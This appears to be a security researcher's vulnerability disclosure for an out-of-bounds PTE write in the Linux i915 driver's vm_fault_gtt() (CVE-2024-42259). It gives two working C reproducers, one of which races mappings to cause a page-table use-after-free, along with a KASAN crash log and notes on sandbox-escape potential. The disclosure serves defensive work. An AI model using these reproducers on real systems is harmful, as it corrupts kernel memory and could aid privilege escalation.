Linux i915 PTE Use-After-Free
Linux i915 suffers from an out-of-bounds PTE write in vm_fault_gtt() that leads to a PTE use-after-free vulnerability.
I found a bug in the i915 code that allows a process with access to a render node (/dev/dri/renderD128) to corrupt kernel memory.

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-08-28.

Summary

vm_fault_gtt() calls remap_io_mapping() with an incorrect size; it should limit the size to area->vm_end - {address passed to remap_io_mapping} instead of area->vm_end - area->vm_start.

Bug description

[For people reading this bug report who are not i915 experts: I highly recommend first reading sima's "i915/GEM Crashcourse" at https://blog.ffwll.ch/2013/01/i915gem-crashcourse-overview.html. I wouldn't have understood what's going on in this code without reading that.]

I found a bug in vm_fault_gtt() in drivers/gpu/drm/i915/gem/i915_gem_mman.c. PTEs pointing into the GTT MMIO window are written as follows:

    /* Now pin it into the GTT as needed */
    vma = i915_gem_object_ggtt_pin_ww(obj, &ww, NULL, 0, 0,
                                      PIN_MAPPABLE |
                                      PIN_NONBLOCK /* NOWARN */ |
                                      PIN_NOEVICT);
    if (IS_ERR(vma) && vma != ERR_PTR(-EDEADLK)) {
            /* Use a partial view if it is bigger than available space */
            struct i915_gtt_view view =
                    compute_partial_view(obj, page_offset, MIN_CHUNK_PAGES);
            [...]
            vma = i915_gem_object_ggtt_pin_ww(obj, &ww, &view, 0, 0, flags);
            [...]
    }
    [...]
    /* Finally, remap it using the new GTT offset */
    ret = remap_io_mapping(area,
                           area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT),
                           (ggtt->gmadr.start + i915_ggtt_offset(vma)) >> PAGE_SHIFT,
                           min_t(u64, vma->size, area->vm_end - area->vm_start),
                           &ggtt->iomap);

In the case where the first i915_gem_object_ggtt_pin_ww() call refuses to map the whole object into the GTT MMIO window, for example because the object is too big to fit into the window, a subrange of the object is mapped instead.
When this happens and the subrange is not at the start of the VMA, vma->gtt_view.partial.offset is nonzero. In this case, the size parameter passed to remap_io_mapping() is calculated incorrectly: it is limited to the size of the VMA (area->vm_end - area->vm_start), but it is applied starting at an address that is higher than where the VMA starts (area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT)), so the end address is only limited to area->vm_end + (vma->gtt_view.partial.offset << PAGE_SHIFT).

When the VMA covers the whole object, this has no bad consequences because of the min_t(); but if the VMA is shorter than the object, PTEs can be written out of bounds.

This can be tested with the following reproducer; on my system it causes "BUG: Bad page map" and "BUG: Bad rss-counter" errors when the reproducer tries to exit:

    // written for a device with Xe Graphics (TGL GT2)
    #define _GNU_SOURCE
    #include <err.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <inttypes.h>
    #include <sys/ioctl.h>
    #include <sys/mman.h>
    #include <drm/i915_drm.h>

    #define SYSCHK(x) ({          \
      typeof(x) __res = (x);      \
      if (__res == (typeof(x))-1) \
        err(1, "SYSCHK(" #x ")"); \
      __res;                      \
    })

    #define MiB *(1024*1024)

    void poke(volatile char *p) {
      printf("poking %p\n", p);
      *p = 1;
    }

    int main(void) {
      int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));
      struct drm_i915_gem_create gem_create = {
        .size = 257 MiB /* a bit over half the GGTT aperture size on my machine */
      };
      SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));
      printf("created GEM 0x%x\n", gem_create.handle);

      struct drm_i915_gem_mmap_offset mmap_offset_arg = {
        .handle = gem_create.handle,
        .flags = I915_MMAP_OFFSET_GTT
      };
      SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));
      printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);

    #define MAP_SIZE (128 MiB - 0x80000)
      volatile char *map = (volatile char *)SYSCHK(mmap(NULL, MAP_SIZE,
          PROT_READ|PROT_WRITE, MAP_SHARED, fd, mmap_offset_arg.offset));
      printf("mapped from %p\n", map);
      poke(map + MAP_SIZE - 0x1000); // fault on the last page of the mapping
      poke(map);                     // fault on the first page of the mapping
      printf("mapped to %p\n", map + MAP_SIZE);
    }

Code history

The current form of the buggy code is from commit c58305af1835 ("drm/i915: Use remap_io_mapping() to prefault all PTE in a single pass", landed in v4.9), but I think back then it was unreachable because the code for constructing a partial view limited the partial view's size based on the VMA bounds:

    view.params.partial.size =
            min_t(unsigned int, chunk_size,
                  (area->vm_end - area->vm_start) / PAGE_SIZE -
                  view.params.partial.offset);

This safety check was removed in commit 8201c1fad4f4 ("drm/i915: Clip the partial view against the object not vma", first in v4.11). I suspect the bug became hittable after that point.

Most places in the kernel that install PFNMAP PTEs use helpers like remap_pfn_range() that make sure the passed range fits into the specified VMA; but it looks like i915 doesn't use those because it wants to be able to clobber existing PTEs, which the usual helpers treat as an error. (See commit 0e4fe0c9f2f9 ("Revert "i915: use io_mapping_map_user"").) i915 instead uses its own helper, remap_io_mapping(), which just writes PTEs in the specified virtual address range.

Exploitability

One consequence of this bug is that, because PFNMAP PTEs are written outside the region covered by the VMA, the MM subsystem can't shoot them down when the driver wants to revoke userspace's access to the region. So this could probably be used to gain access to memory that is later mapped into the GTT in the MMIO window, but I don't know enough about i915 to tell whether that is bad or whether shaders always have access to all GTT memory anyway.

Probably another consequence would be that if you had a VMA at the end of the userspace virtual address space, you could get memory mapped into the kernel half of the address space?
But that probably wouldn't lead to anything overly bad...

The one way I know of to turn this bug into something that is definitely bad is to turn it into a page table UAF, like in https://crbug.com/project-zero/2350: When you're only holding the mmap_lock in read mode (like in a page fault handler), page tables that are not needed by any VMA can be freed concurrently. So if we have one GTT-backed VMA directly ahead of a second VMA, and then concurrently trigger a fault in the GTT-backed VMA while unmapping the second VMA, the out-of-bounds page table access off of the first VMA can walk page tables that are concurrently freed.

I tested this in a v6.9.2 kernel build with CONFIG_KASAN=y (for detecting UAF access) and CONFIG_RCU_STRICT_GRACE_PERIOD=y (a debugging option that makes RCU grace periods much shorter at the expense of performance, which makes it easier to detect use-after-free bugs for objects that are RCU-freed), using the following reproducer, running on a system with Xe Graphics (TGL GT2):

    // written for a device with Xe Graphics (TGL GT2)
    #define _GNU_SOURCE
    #include <pthread.h>
    #include <err.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <inttypes.h>
    #include <sys/ioctl.h>
    #include <sys/mman.h>
    #include <drm/i915_drm.h>

    #define SYSCHK(x) ({          \
      typeof(x) __res = (x);      \
      if (__res == (typeof(x))-1) \
        err(1, "SYSCHK(" #x ")"); \
      __res;                      \
    })

    #define MiB *(1024*1024)

    // virtual address at the boundary between PGD entries
    #define PGD_BOUNDARY_ADDR 0x8000000000
    #define MAP_SIZE (128 MiB - 0x80000)
    #define LEFT_MAPPING_ADDR (PGD_BOUNDARY_ADDR - MAP_SIZE)
    #define FLIPPER_MAP_SIZE 0x200000

    // repeatedly maps and unmaps a second GTT mapping directly above the PGD boundary
    static void *flipper_thread_fn(void *dummy) {
      int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));
      struct drm_i915_gem_create gem_create = {
        .size = FLIPPER_MAP_SIZE
      };
      SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));
      printf("flipper created GEM 0x%x\n", gem_create.handle);
      struct drm_i915_gem_mmap_offset mmap_offset_arg = {
        .handle = gem_create.handle,
        .flags = I915_MMAP_OFFSET_GTT
      };
      SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));
      printf("flipper fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);

      while (1) {
        SYSCHK(mmap((void*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE, PROT_READ|PROT_WRITE,
                    MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset));
        SYSCHK(munmap((void*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE));
      }
      return NULL;
    }

    int main(void) {
      pthread_t flipper_thread;
      if (pthread_create(&flipper_thread, NULL, flipper_thread_fn, NULL))
        errx(1, "pthread_create");

      int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR));
      struct drm_i915_gem_create gem_create = {
        .size = 257 MiB /* a bit over half the GGTT aperture size on my machine */
      };
      SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create));
      printf("created GEM 0x%x\n", gem_create.handle);

      struct drm_i915_gem_mmap_offset mmap_offset_arg = {
        .handle = gem_create.handle,
        .flags = I915_MMAP_OFFSET_GTT
      };
      SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg));
      printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset);

      while (1) {
        SYSCHK(mmap((void*)LEFT_MAPPING_ADDR, MAP_SIZE, PROT_READ|PROT_WRITE,
                    MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset));
        // fault on the last page below the PGD boundary, racing with the flipper
        *(volatile char *)(PGD_BOUNDARY_ADDR - 0x1000);
        SYSCHK(munmap((void*)LEFT_MAPPING_ADDR, MAP_SIZE));
      }
    }

With that, I quickly got a KASAN splat (with guessed unwind lines removed):

    [ 906.394685] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF
    [ 906.657887] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF
    [ 906.819808] ==================================================================
    [ 906.819819] BUG: KASAN: use-after-free in pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416)
    [ 906.819827] Read of size 8 at addr ffff888180919000 by task linux-i915-oob-/3809
    [ 906.819832] CPU: 3 PID: 3809 Comm: linux-i915-oob- Not tainted 6.9.2 #3
    [ 906.819835] Hardware name: [...]
    [ 906.819838] Call Trace:
    [ 906.819839]  <TASK>
    [ 906.819841] dump_stack_lvl (lib/dump_stack.c:117 (discriminator 1))
    [ 906.819847] print_report (mm/kasan/report.c:378 mm/kasan/report.c:488)
    [ 906.819859] kasan_report (mm/kasan/report.c:603)
    [ 906.819865] pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416)
    [ 906.819869] __pte_alloc (mm/memory.c:445)
    [ 906.819886] __apply_to_page_range (mm/memory.c:2728 mm/memory.c:2788 mm/memory.c:2824 mm/memory.c:2860 mm/memory.c:2894)
    [ 906.819893] remap_io_mapping (drivers/gpu/drm/i915/i915_mm.c:110)
    [ 906.819905] vm_fault_gtt (drivers/gpu/drm/i915/gem/i915_gem_mman.c:411)
    [ 906.819924] __do_fault (mm/memory.c:4531)
    [ 906.819927] do_fault (mm/memory.c:4894 mm/memory.c:5024)
    [ 906.819931] __handle_mm_fault (mm/memory.c:3880 mm/memory.c:5300 mm/memory.c:5441)
    [ 906.819948] handle_mm_fault (mm/memory.c:5466 mm/memory.c:5622)
    [ 906.819951] do_user_addr_fault (arch/x86/mm/fault.c:1384)
    [ 906.819959] exc_page_fault (./arch/x86/include/asm/irqflags.h:37 ./arch/x86/include/asm/irqflags.h:72 arch/x86/mm/fault.c:1482 arch/x86/mm/fault.c:1532)
    [ 906.819963] asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:623)
    [ 906.819967] RIP: 0033:0x561a370af516
    [ 906.819970] Code: 48 83 7d e8 ff 75 19 48 8d 05 26 0d 00 00 48 89 c6 bf 01 00 00 00 b8 00 00 00 00 e8 64 fb ff ff 48 b8 00 f0 ff ff 7f 00 00 00 <0f> b6 00 be 00 00 f8 07 48 b8 00 00 08 f8 7f 00 00 00 48 89 c7 e8
    All code
    ========
       0:   48 83 7d e8 ff          cmpq   $0xffffffffffffffff,-0x18(%rbp)
       5:   75 19                   jne    0x20
       7:   48 8d 05 26 0d 00 00    lea    0xd26(%rip),%rax        # 0xd34
       e:   48 89 c6                mov    %rax,%rsi
      11:   bf 01 00 00 00          mov    $0x1,%edi
      16:   b8 00 00 00 00          mov    $0x0,%eax
      1b:   e8 64 fb ff ff          call   0xfffffffffffffb84
      20:   48 b8 00 f0 ff ff 7f    movabs $0x7ffffff000,%rax
      27:   00 00 00
      2a:*  0f b6 00                movzbl (%rax),%eax        <-- trapping instruction
      2d:   be 00 00 f8 07          mov    $0x7f80000,%esi
      32:   48 b8 00 00 08 f8 7f    movabs $0x7ff8080000,%rax
      39:   00 00 00
      3c:   48 89 c7                mov    %rax,%rdi
      3f:   e8                      .byte 0xe8

    Code starting with the faulting instruction
    ===========================================
       0:   0f b6 00                movzbl (%rax),%eax
       3:   be 00 00 f8 07          mov    $0x7f80000,%esi
       8:   48 b8 00 00 08 f8 7f    movabs $0x7ff8080000,%rax
       f:   00 00 00
      12:   48 89 c7                mov    %rax,%rdi
      15:   e8                      .byte 0xe8
    [ 906.819973] RSP: 002b:00007ffdd0b75430 EFLAGS: 00010213
    [ 906.819976] RAX: 0000007ffffff000 RBX: 00007ffdd0b755a8 RCX: 00007f8a3a3848a3
    [ 906.819978] RDX: 0000000000000003 RSI: 0000000007f80000 RDI: 0000007ff8080000
    [ 906.819980] RBP: 00007ffdd0b75490 R08: 0000000000000003 R09: 0000000135188000
    [ 906.819982] R10: 0000000000100001 R11: 0000000000000246 R12: 0000000000000000
    [ 906.819984] R13: 00007ffdd0b755b8 R14: 0000561a370b1dd8 R15: 00007f8a3a4b9020
    [ 906.819987]  </TASK>
    [ 906.819990] The buggy address belongs to the physical page:
    [ 906.819992] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x180919
    [ 906.819994] flags: 0x4000000000000000(zone=1)
    [ 906.819997] page_type: 0xffffffff()
    [ 906.820000] raw: 4000000000000000 ffffea0006024688 ffffea0006024788 0000000000000000
    [ 906.820002] raw: 0000000000000000 0000000000000001 00000000ffffffff 0000000000000000
    [ 906.820004] page dumped because: kasan: bad access detected
    [ 906.820006] Memory state around the buggy address:
    [ 906.820008]  ffff888180918f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    [ 906.820010]  ffff888180918f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    [ 906.820011] >ffff888180919000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    [ 906.820013]                    ^
    [ 906.820014]  ffff888180919080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    [ 906.820016]  ffff888180919100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
    [ 906.820017] ==================================================================

This bug is probably not very interesting on Linux servers, since access to the render node is typically only granted to UIDs who have locally signed in to a machine; but it is probably relevant for things like ChromeOS, and maybe also for escaping from some types of sandboxed desktop applications?

Related CVE Number: CVE-2024-42259.

Found by: [email protected]